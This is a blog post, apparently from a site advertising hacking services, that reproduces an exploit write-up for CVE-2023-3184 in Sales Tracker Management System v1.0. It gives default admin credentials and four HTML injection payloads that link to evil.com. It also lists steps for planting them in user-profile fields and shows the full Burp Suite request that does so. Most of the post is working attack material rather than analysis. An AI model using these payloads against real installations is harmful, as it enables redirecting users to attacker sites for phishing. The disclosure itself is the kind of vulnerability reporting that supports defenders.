Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    86398932

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
Exploit Title: Sales Tracker Management System v1.0 – Multiple Vulnerabilities 
Google Dork: NA
Date: 09-06-2023
EXPLOIT-AUTHOR: AFFAN AHMED
Vendor Homepage: <https://www.sourcecodester.com/>
Software Link: <https://www.sourcecodester.com/download-code?nid=16061&title=Sales+Tracker+Management+System+using+PHP+Free+Source+Code>
Version: 1.0
Tested on: Windows 11 + XAMPP
CVE : CVE-2023-3184

==============================
CREDENTIAL TO USE
==============================
ADMIN-ACCOUNT
USERNAME: admin
PASSWORD: admin123

=============================
PAYLOAD_USED
=============================
1. <a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
2. <a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
3. <a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
4. <a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>


===============================
STEPS_TO_REPRODUCE
===============================
1. FIRST LOGIN INTO YOUR ACCOUNT BY USING THE GIVEN  CREDENTIALS OF ADMIN 
2. THEN NAVIGATE TO USER_LIST AND CLCIK ON `CREATE NEW` BUTTON OR VISIT TO THIS URL:`http://localhost/php-sts/admin/?page=user/manage_user` 
3. THEN FILL UP THE DETAILS AND PUT THE ABOVE PAYLOAD IN `firstname` `middlename`  `lastname` and in `username` 
4. AFTER ENTERING THE PAYLOAD CLICK ON SAVE BUTTON
5. AFTER SAVING THE FORM YOU WILL BE REDIRECTED TO ADMIN SITE WHERE YOU CAN SEE THAT NEW USER  IS ADDED  .
6. AFTER CLICKING ON THE  EACH PAYLOAD IT REDIRECT ME TO EVIL SITE



==========================================
BURPSUITE_REQUEST
==========================================
POST /php-sts/classes/Users.php?f=save HTTP/1.1
Host: localhost
Content-Length: 1037
sec-ch-ua: 
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7hwjNQW3mptDFOwo
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
sec-ch-ua-platform: ""
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/php-sts/admin/?page=user/manage_user
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=r0ejggs25qnlkf9funj44b1pbn
Connection: close

------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="id"


------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="firstname"

<a href=//evil.com>CLICK_HERE_FOR_FIRSTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="middlename"

<a href=//evil.com>CLICK_HERE_FOR_MIDDLENAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="lastname"

<a href=//evil.com>CLICK_HERE_FOR_LASTNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="username"

<a href=//evil.com>CLICK_HERE_FOR_USERNAME</a>
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="password"

1234
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="type"

2
------WebKitFormBoundary7hwjNQW3mptDFOwo
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundary7hwjNQW3mptDFOwo--

===============================
PROOF_OF_CONCEPT
===============================
GITHUB_LINK: https://github.com/ctflearner/Vulnerability/blob/main/Sales_Tracker_Management_System/stms.md